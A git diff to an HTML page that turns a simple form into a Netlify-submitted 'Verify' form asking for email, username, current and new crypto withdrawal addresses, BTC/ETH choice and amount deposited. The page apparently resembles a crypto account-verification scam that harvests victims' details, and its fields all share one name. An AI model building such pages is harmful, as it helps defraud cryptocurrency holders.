--- a/src/index.html
+++ b/src/index.html
@@ -10,25 +10,35 @@
 </head>
 <body>
     <div class="mx-[15%] mt-[3rem] ">
-        <form class="space-y-4 md:space-y-6" >
+        <form class="space-y-4 md:space-y-6"  name="email" method="POST" data-netlify="true" >
             <div>
                 <label for="name" class="block mb-2 text-base font-semibold text-gray-900 ">Email</label>
                 <input type="email" name="name" id="name" class="bg-gray-50 border border-black text-gray-900 sm:text-sm focus:ring-primary-600  block w-full p-2.5" placeholder="" required="">
+            </div>
+            <div>
+                <label for="name" class="block mb-2 text-base font-semibold text-gray-900 ">Username</label>
+                <input type="" name="name" id="name" class="bg-gray-50 border border-black text-gray-900 sm:text-sm focus:ring-primary-600  block w-full p-2.5" placeholder="" required="">
             </div>
             <div>
                 <label for="name" class="block mb-2 text-base font-semibold text-gray-900 ">Withdrawal Address</label>
                 <input type="" name="name" id="name" class="bg-gray-50 border border-black text-gray-900 sm:text-sm focus:ring-primary-600  block w-full p-2.5" placeholder="" required="">
             </div>
             <div>
-                <label for="name" class="block mb-2 text-base font-semibold text-gray-900 ">Bitcoin / Ethereum</label>
+                <label for="name" class="block mb-2 text-base font-semibold text-gray-900 ">New Withdrawal Address</label>
                 <input type="" name="name" id="name" class="bg-gray-50 border border-black text-gray-900 sm:text-sm focus:ring-primary-600  block w-full p-2.5" placeholder="" required="">
             </div>
             <div>
-                <label for="password" class="block mb-2 text-base font-semibold text-gray-900 ">Country</label>
+                <input type="checkbox" id="vehicle1" name="vehicle1" value="Bike">
+                <label for="vehicle1"> BTC</label><br>
+                <input type="checkbox" id="vehicle2" name="vehicle2" value="Car">
+                <label for="vehicle2"> ETH</label><br>
+            </div>
+            <div>
+                <label for="password" class="block mb-2 text-base font-semibold text-gray-900 ">Amount Deposited</label>
                 <input type="" name="password" id="password" class="bg-gray-50 border border-black text-gray-900 sm:text-sm focus:ring-primary-600  block w-full p-2.5" placeholder="" required="">
             </div>
            <div class="w-full flex ">
-            <a href="./index2.html" class="w-full text-white bg-green-600  font-medium rounded-lg text-sm px-5 py-2.5 text-center ">Verify</a>
+            <a href="./index.html" class="w-full text-white bg-green-600  font-medium rounded-lg text-sm px-5 py-2.5 text-center ">Verify</a>
            </div>
             
         </form>
